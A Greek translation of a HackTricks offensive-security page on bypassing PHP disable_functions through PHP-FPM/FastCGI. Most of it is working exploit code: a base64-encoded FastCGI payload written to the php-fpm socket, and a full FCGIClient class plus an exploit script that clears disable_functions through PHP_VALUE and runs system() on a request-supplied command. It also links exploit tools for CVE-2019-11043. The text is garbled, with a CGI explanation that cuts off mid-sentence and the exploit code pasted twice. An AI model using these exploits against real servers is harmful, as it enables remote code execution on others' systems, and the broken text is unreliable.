disable_functions bypass - php-fpm/FastCGI

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

PHP-FPM

Το PHP-FPM παρουσιάζεται ως μια ανώτερη εναλλακτική λύση στο κανονικό PHP FastCGI, προσφέροντας χαρακτηριστικά που είναι ιδιαίτερα επωφελή για ιστότοπους με υψηλή κίνηση. Λειτουργεί μέσω ενός κύριου διεργασίας που εποπτεύει μια συλλογή από διεργασίες εργαζομένων. Για ένα αίτημα σε ένα PHP script, είναι ο διακομιστής ιστού που ξεκινά μια σύνδεση μεσολάβησης FastCGI στην υπηρεσία PHP-FPM. Αυτή η υπηρεσία έχει τη δυνατότητα να λαμβάνει αιτήσεις είτε μέσω θυρών δικτύου στον διακομιστή είτε μέσω Unix sockets.

Παρά τον μεσολαβητικό ρόλο της σύνδεσης μεσολάβησης, το PHP-FPM πρέπει να είναι λειτουργικό στον ίδιο υπολογιστή με τον διακομιστή ιστού. Η σύνδεση που χρησιμοποιεί, αν και βασίζεται σε μεσολαβητική σύνδεση, διαφέρει από τις συμβατικές μεσολαβητικές συνδέσεις. Μετά τη λήψη μιας αίτησης, ένας διαθέσιμος εργαζόμενος από το PHP-FPM την επεξεργάζεται - εκτελεί το PHP script και στη συνέχεια αποστέλλει τα αποτελέσματα πίσω στον διακομιστή ιστού. Αφού ένας εργαζόμενος ολοκληρώσει την επεξεργασία μιας αίτησης, γίνεται ξανά διαθέσιμος για επερχόμενες αιτήσεις.

Αλλά τι είναι το CGI και το FastCGI;

CGI

Συνήθως οι ιστοσελίδες, τα αρχεία και όλα τα έγγραφα που μεταφέρονται από τον διακομιστή ιστού στον περιηγητή αποθηκεύονται σε ένα συγκεκριμένο δημόσιο κατάλογο, όπως το home/user/public_html. Όταν ο περιηγητής ζητάει συγκεκριμένο περιεχόμενο, ο διακομιστής ελέγχει αυτόν τον κατάλογο και στέλνει το απαιτούμενο αρχείο στον περιηγητή.

Εάν το CGI είναι εγκατεστημένο στον διακομιστή, τότε προστίθεται επίσης ο συγκεκριμένος κατάλογος cgi-bin, για παράδειγμα home/user/public_html/cgi-bin. Τα CGI scripts αποθηκεύονται σε αυτόν τον κατάλογο. Κάθε αρχείο στον κατάλογο θεωρείται ως εκτελέσιμο πρόγραμμα. Όταν προσπελαύνετε ένα script από τον κατάλογο, ο διακομιστής στέλνει αίτηση στην εφαρμογή που είναι υπεύθυνη για αυτό το script, αντί να στέλνει το περιεχόμενο του αρχείου στον περιηγητή. Αφού ολοκληρωθεί η επεξεργασία των εισρεθέντων δεδομένων, η εφαρμογή στέλνει τα δεδομένα εξόδου στον διακομιστή ιστού, ο οποίος με τη σειρά του μεταφέρει τα δεδομένα στον πελάτη HTTP.

Για παράδειγμα, όταν προσπελαύνετε το CGI script http://mysitename.com/cgi-bin/file.pl, ο διακομιστής θα εκτελέσει την κατάλληλη εφαρμογή Perl μέσω CGI. Τα δεδομένα που παράγονται από την εκτέλεση του script θα αποσταλούν από την εφαρμογή στον διακομιστή ιστού. Ο διακομιστής, από την άλλη πλευρά, θα μεταφέρει τα δεδομένα στον περιηγητή. Εάν ο διακομιστής δεν είχε το CGI, ο περιηγητής θα εμφάνιζε τον Στη συνέχεια, μπορείτε να αντλήσετε τον κωδικοποιημένο με urlencoded φορτίο και να το αποκωδικοποιήσετε και να το μετατρέψετε σε base64, χρησιμοποιώντας αυτήν τη συνταγή του cyberchef για παράδειγμα. Και στη συνέχεια αντιγράφετε/επικολλάτε το base64 σε αυτόν τον κώδικα php:

<?php
$fp = fsockopen("unix:///var/run/php/php7.0-fpm.sock", -1, $errno, $errstr, 30); fwrite($fp,base64_decode("AQEAAQAIAAAAAQAAAAAAAAEEAAEBBAQADxBTRVJWRVJfU09GVFdBUkVnbyAvIGZjZ2ljbGllbnQgCwlSRU1PVEVfQUREUjEyNy4wLjAuMQ8IU0VSVkVSX1BST1RPQ09MSFRUUC8xLjEOAkNPTlRFTlRfTEVOR1RINzYOBFJFUVVFU1RfTUVUSE9EUE9TVAlLUEhQX1ZBTFVFYWxsb3dfdXJsX2luY2x1ZGUgPSBPbgpkaXNhYmxlX2Z1bmN0aW9ucyA9IAphdXRvX3ByZXBlbmRfZmlsZSA9IHBocDovL2lucHV0DxdTQ1JJUFRfRklMRU5BTUUvdmFyL3d3dy9odG1sL2luZGV4LnBocA0BRE9DVU1FTlRfUk9PVC8AAAAAAQQAAQAAAAABBQABAEwEADw/cGhwIHN5c3RlbSgnd2hvYW1pID4gL3RtcC93aG9hbWkudHh0Jyk7ZGllKCctLS0tLU1hZGUtYnktU3B5RDNyLS0tLS0KJyk7Pz4AAAAA"));

Ανεβάζοντας και αποκτώντας πρόσβαση σε αυτό το σενάριο, η εκμετάλλευση θα αποσταλεί στο FastCGI (απενεργοποιώντας την disable_functions) και θα εκτελεστούν οι καθορισμένες εντολές.

Εκμετάλλευση PHP

Δεν είμαι σίγουρος αν αυτό λειτουργεί σε σύγχρονες εκδόσεις, γιατί προσπάθησα μία φορά και δεν μπόρεσα να εκτελέσω τίποτα. Πραγματικά κατάφερα να δω ότι η phpinfo() από την εκτέλεση του FastCGI έδειχνε ότι η disable_functions ήταν άδεια, αλλά το PHP (κάπως) εξακολουθούσε να με εμποδίζει από την εκτέλεση οποιασδήποτε προηγουμένως απενεργοποιημένης λειτουργίας. Παρακαλώ, αν έχετε περισσότερες πληροφορίες σχετικά με αυτό, επικοινωνήστε μαζί μου μέσω του [PEASS & HackTricks telegram group εδώ](https://t.me/peass), ή στο twitter [@carlospolopm](https://twitter.com/hacktricks_live).

Κώδικας από εδώ.

<?php
/**
* Note : Code is released under the GNU LGPL
*
* Please do not change the header of this file
*
* This library is free software; you can redistribute it and/or modify it under the terms of the GNU
* Lesser General Public License as published by the Free Software Foundation; either version 2 of
* the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
* without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*
* See the GNU Lesser General Public License for more details.
*/
/**
* Handles communication with a FastCGI application
*
* @author      Pierrick Charron <pierrick@webstart.fr>
* @version     1.0
*/
class FCGIClient
{
const VERSION_1            = 1;
const BEGIN_REQUEST        = 1;
const ABORT_REQUEST        = 2;
const END_REQUEST          = 3;
const PARAMS               = 4;
const STDIN                = 5;
const STDOUT               = 6;
const STDERR               = 7;
const DATA                 = 8;
const GET_VALUES           = 9;
const GET_VALUES_RESULT    = 10;
const UNKNOWN_TYPE         = 11;
const MAXTYPE              = self::UNKNOWN_TYPE;
const RESPONDER            = 1;
const AUTHORIZER           = 2;
const FILTER               = 3;
const REQUEST_COMPLETE     = 0;
const CANT_MPX_CONN        = 1;
const OVERLOADED           = 2;
const UNKNOWN_ROLE         = 3;
const MAX_CONNS            = 'MAX_CONNS';
const MAX_REQS             = 'MAX_REQS';
const MPXS_CONNS           = 'MPXS_CONNS';
const HEADER_LEN           = 8;
/**
* Socket
* @var Resource
*/
private $_sock = null;
/**
* Host
* @var String
*/
private $_host = null;
/**
* Port
* @var Integer
*/
private $_port = null;
/**
* Keep Alive
* @var Boolean
*/
private $_keepAlive = false;
/**
* Constructor
*
* @param String $host Host of the FastCGI application
* @param Integer $port Port of the FastCGI application
*/
public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket
{
$this->_host = $host;
$this->_port = $port;
}
/**
* Define whether or not the FastCGI application should keep the connection
* alive at the end of a request
*
* @param Boolean $b true if the connection should stay alive, false otherwise
*/
public function setKeepAlive($b)
{
$this->_keepAlive = (boolean)$b;
if (!$this->_keepAlive && $this->_sock) {
fclose($this->_sock);
}
}
/**
* Get the keep alive status
*
* @return Boolean true if the connection should stay alive, false otherwise
*/
public function getKeepAlive()
{
return $this->_keepAlive;
}
/**
* Create a connection to the FastCGI application
*/
private function connect()
{
if (!$this->_sock) {
//$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);
$this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5);
if (!$this->_sock) {
throw new Exception('Unable to connect to FastCGI application');
}
}
}
/**
* Build a FastCGI packet
*
* @param Integer $type Type of the packet
* @param String $content Content of the packet
* @param Integer $requestId RequestId
*/
private function buildPacket($type, $content, $requestId = 1)
{
$clen = strlen($content);
return chr(self::VERSION_1)         /* version */
. chr($type)                    /* type */
. chr(($requestId >> 8) & 0xFF) /* requestIdB1 */
. chr($requestId & 0xFF)        /* requestIdB0 */
. chr(($clen >> 8 ) & 0xFF)     /* contentLengthB1 */
. chr($clen & 0xFF)             /* contentLengthB0 */
. chr(0)                        /* paddingLength */
. chr(0)                        /* reserved */
. $content;                     /* content */
}
/**
* Build an FastCGI Name value pair
*
* @param String $name Name
* @param String $value Value
* @return String FastCGI Name value pair
*/
private function buildNvpair($name, $value)
{
$nlen = strlen($name);
$vlen = strlen($value);
if ($nlen < 128) {
/* nameLengthB0 */
$nvpair = chr($nlen);
} else {
/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */
$nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
}
if ($vlen < 128) {
/* valueLengthB0 */
$nvpair .= chr($vlen);
} else {
/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */
$nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
}
/* nameData & valueData */
return $nvpair . $name . $value;
}
/**
* Read a set of FastCGI Name value pairs
*
* @param String $data Data containing the set of FastCGI NVPair
* @return array of NVPair
*/
private function readNvpair($data, $length = null)
{
$array = array();
if ($length === null) {
$length = strlen($data);
}
$p = 0;
while ($p != $length) {
$nlen = ord($data{$p++});
if ($nlen >= 128) {
$nlen = ($nlen & 0x7F << 24);
$nlen |= (ord($data{$p++}) << 16);
$nlen |= (ord($data{$p++}) << 8);
$nlen |= (ord($data{$p++}));
}
$vlen = ord($data{$p++});
if ($vlen >= 128) {
$vlen = ($nlen & 0x7F << 24);
$vlen |= (ord($data{$p++}) << 16);
$vlen |= (ord($data{$p++}) << 8);
$vlen |= (ord($data{$p++}));
}
$array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen);
$p += ($nlen + $vlen);
}
return $array;
}
/**
* Decode a FastCGI Packet
*
* @param String $data String containing all the packet
* @return array
*/
private function decodePacketHeader($data)
{
$ret = array();
$ret['version']       = ord($data{0});
$ret['type']          = ord($data{1});
$ret['requestId']     = (ord($data{2}) << 8) + ord($data{3});
$ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5});
$ret['paddingLength'] = ord($data{6});
$ret['reserved']      = ord($data{7});
return $ret;
}
/**
* Read a FastCGI Packet
*
* @return array
*/
private function readPacket()
{
if ($packet = fread($this->_sock, self::HEADER_LEN)) {
$resp = $this->decodePacketHeader($packet);
$resp['content'] = '';
if ($resp['contentLength']) {
$len  = $resp['contentLength'];
while ($len && $buf=fread($this->_sock, $len)) {
$len -= strlen($buf);
$resp['content'] .= $buf;
}
}
if ($resp['paddingLength']) {
$buf=fread($this->_sock, $resp['paddingLength']);
}
return $resp;
} else {
return false;
}
}
/**
* Get Informations on the FastCGI application
*
* @param array $requestedInfo information to retrieve
* @return array
*/
public function getValues(array $requestedInfo)
{
$this->connect();
$request = '';
foreach ($requestedInfo as $info) {
$request .= $this->buildNvpair($info, '');
}
fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0));
$resp = $this->readPacket();
if ($resp['type'] == self::GET_VALUES_RESULT) {
return $this->readNvpair($resp['content'], $resp['length']);
} else {
throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');
}
}
/**
* Execute a request to the FastCGI application
*
* @param array $params Array of parameters
* @param String $stdin Content
```php
* @return String
*/
public function request(array $params, $stdin)
{
$response = '';
$this->connect();
$request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
$paramsRequest = '';
foreach ($params as $key => $value) {
$paramsRequest .= $this->buildNvpair($key, $value);
}
if ($paramsRequest) {
$request .= $this->buildPacket(self::PARAMS, $paramsRequest);
}
$request .= $this->buildPacket(self::PARAMS, '');
if ($stdin) {
$request .= $this->buildPacket(self::STDIN, $stdin);
}
$request .= $this->buildPacket(self::STDIN, '');
fwrite($this->_sock, $request);
do {
$resp = $this->readPacket();
if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
$response .= $resp['content'];
}
} while ($resp && $resp['type'] != self::END_REQUEST);
var_dump($resp);
if (!is_array($resp)) {
throw new Exception('Bad request');
}
switch (ord($resp['content']{4})) {
case self::CANT_MPX_CONN:
throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]');
break;
case self::OVERLOADED:
throw new Exception('New request rejected; too busy [OVERLOADED]');
break;
case self::UNKNOWN_ROLE:
throw new Exception('Role value not known [UNKNOWN_ROLE]');
break;
case self::REQUEST_COMPLETE:
return $response;
}
}
}
?>
<?php
// real exploit start here
if (!isset($_REQUEST['cmd'])) {
die("Check your input\n");
}
if (!isset($_REQUEST['filepath'])) {
$filepath = __FILE__;
}else{
$filepath = $_REQUEST['filepath'];
}
$req = '/'.basename($filepath);
$uri = $req .'?'.'command='.$_REQUEST['cmd'];
$client = new FCGIClient("unix:///var/run/php-fpm.sock", -1);
$code = "<?php system(\$_REQUEST['command']); phpinfo(); ?>"; // php payload -- Doesnt do anything
$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";
//$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php";
$params = array(
'GATEWAY_INTERFACE' => 'FastCGI/1.0',
'REQUEST_METHOD'    => 'POST',
'SCRIPT_FILENAME'   => $filepath,
'SCRIPT_NAME'       => $req,
'QUERY_STRING'      => 'command='.$_REQUEST['cmd'],
'REQUEST_URI'       => $uri,
'DOCUMENT_URI'      => $req,
#'DOCUMENT_ROOT'     => '/',
'PHP_VALUE'         => $php_value,
'SERVER_SOFTWARE'   => '80sec/wofeiwo',
'REMOTE_ADDR'       => '127.0.0.1',
'REMOTE_PORT'       => '9985',
'SERVER_ADDR'       => '127.0.0.1',
'SERVER_PORT'       => '80',
'SERVER_NAME'       => 'localhost',
'SERVER_PROTOCOL'   => 'HTTP/1.1',
'CONTENT_LENGTH'    => strlen($code)
);
// print_r($_REQUEST);
// print_r($params);
//echo "Call: $uri\n\n";
echo $client->request($params, $code)."\n";
?>

* @return String
*/
public function request(array $params, $stdin)
{
$response = '';
$this->connect();
$request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
$paramsRequest = '';
foreach ($params as $key => $value) {
$paramsRequest .= $this->buildNvpair($key, $value);
}
if ($paramsRequest) {
$request .= $this->buildPacket(self::PARAMS, $paramsRequest);
}
$request .= $this->buildPacket(self::PARAMS, '');
if ($stdin) {
$request .= $this->buildPacket(self::STDIN, $stdin);
}
$request .= $this->buildPacket(self::STDIN, '');
fwrite($this->_sock, $request);
do {
$resp = $this->readPacket();
if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
$response .= $resp['content'];
}
} while ($resp && $resp['type'] != self::END_REQUEST);
var_dump($resp);
if (!is_array($resp)) {
throw new Exception('Bad request');
}
switch (ord($resp['content']{4})) {
case self::CANT_MPX_CONN:
throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]');
break;
case self::OVERLOADED:
throw new Exception('New request rejected; too busy [OVERLOADED]');
break;
case self::UNKNOWN_ROLE:
throw new Exception('Role value not known [UNKNOWN_ROLE]');
break;
case self::REQUEST_COMPLETE:
return $response;
}
}
}
?>
<?php
// η πραγματική εκμετάλλευση ξεκινάει εδώ
if (!isset($_REQUEST['cmd'])) {
die("Ελέγξτε την είσοδό σας\n");
}
if (!isset($_REQUEST['filepath'])) {
$filepath = __FILE__;
}else{
$filepath = $_REQUEST['filepath'];
}
$req = '/'.basename($filepath);
$uri = $req .'?'.'command='.$_REQUEST['cmd'];
$client = new FCGIClient("unix:///var/run/php-fpm.sock", -1);
$code = "<?php system(\$_REQUEST['command']); phpinfo(); ?>"; // φορτωμένος κώδικας php -- Δεν κάνει τίποτα
$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";
//$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php";
$params = array(
'GATEWAY_INTERFACE' => 'FastCGI/1.0',
'REQUEST_METHOD'    => 'POST',
'SCRIPT_FILENAME'   => $filepath,
'SCRIPT_NAME'       => $req,
'QUERY_STRING'      => 'command='.$_REQUEST['cmd'],
'REQUEST_URI'       => $uri,
'DOCUMENT_URI'      => $req,
#'DOCUMENT_ROOT'     => '/',
'PHP_VALUE'         => $php_value,
'SERVER_SOFTWARE'   => '80sec/wofeiwo',
'REMOTE_ADDR'       => '127.0.0.1',
'REMOTE_PORT'       => '9985',
'SERVER_ADDR'       => '127.0.0.1',
'SERVER_PORT'       => '80',
'SERVER_NAME'       => 'localhost',
'SERVER_PROTOCOL'   => 'HTTP/1.1',
'CONTENT_LENGTH'    => strlen($code)
);
// print_r($_REQUEST);
// print_r($params);
//echo "Call: $uri\n\n";
echo $client->request($params, $code)."\n";
?>

Χρησιμοποιώντας την προηγούμενη συνάρτηση θα δείτε ότι η συνάρτηση system είναι ακόμα απενεργοποιημένη αλλά το phpinfo() δείχνει ότι η ρύθμιση disable_functions είναι άδεια:

Έτσι, νομίζω ότι μπορείτε να ορίσετε το disable_functions μόνο μέσω των αρχείων ρυθμίσεων .ini του php και η τιμή του PHP_VALUE δεν θα αντικαταστήσει αυτή τη ρύθμιση.

FuckFastGCI

Αυτό είναι ένα php script για εκμετάλλευση του πρωτοκόλλου fastcgi για να παρακάμψετε το open_basedir και το disable_functions. Θα σας βοηθήσει να παρακάμψετε το αυστηρό disable_functions για RCE φορτώνοντας την κακόβουλη επέκταση. Μπορείτε να το βρείτε εδώ: https://github.com/w181496/FuckFastcgi ή μια ελαφρώς τροποποιημένη και βελτιωμένη έκδοση εδώ: https://github.com/BorelEnzo/FuckFastcgi

Θα διαπιστώσετε ότι η εκμετάλλευση είναι πολύ παρόμοια με τον προηγούμενο κώδικα, αλλά αντί να προσπαθεί να παρακάμψει το disable_functions χρησιμοποιώντας το PHP_VALUE, προσπαθεί να φορτώσει μια εξωτερική PHP επέκταση για να εκτελέσει κώδικα χρησιμοποιώντας τις παραμέτρους extension_dir και extension μέσα στη μεταβλητή PHP_ADMIN_VALUE. ΣΗΜΕΙΩΣΗ1: Πιθανόν να χρειαστεί να επαναμεταγλωττίσετε την επέκταση με την ίδια έκδοση PHP που χρησιμοποιεί ο διακομιστής (μπορείτε να το ελέγξετε στην έξοδο του phpinfo):

ΣΗΜΕΙΩΣΗ2: Κατάφερα να το κάνω να λειτουργήσει εισάγοντας τις τιμές extension_dir και extension μέσα σε ένα αρχείο ρυθμίσεων PHP .ini (κάτι που δεν θα μπορέσετε να κάνετε επιτίθεμενοι σε έναν διακομιστή). Ωστόσο, για κάποιο λόγο, όταν χρησιμοποιώ αυτήν την εκμετάλλευση και φορτώνω την επέκταση από τη μεταβλητή PHP_ADMIN_VALUE, η διαδικασία απλά τερματίζεται, οπότε δεν ξέρω αν αυτή η τεχνική είναι ακόμα έγκυρη.

Ευπάθεια Απομακρυσμένης Εκτέλεσης Κώδικα PHP-FPM (CVE-2019–11043)

Μπορείτε να εκμεταλλευτείτε αυτήν την ευπάθεια με το phuip-fpizdam και να το δοκιμάσετε χρησιμοποιώντας αυτό το περιβάλλον docker: https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043. Μπορείτε επίσης να βρείτε μια ανάλυση της ευπάθειας εδώ.

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
Μοιραστείτε τα κόλπα σας για hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousPHP - Useful Functions & disable_functions/open_basedir bypass Nextdisable_functions bypass - dl function

Last updated 2 months ago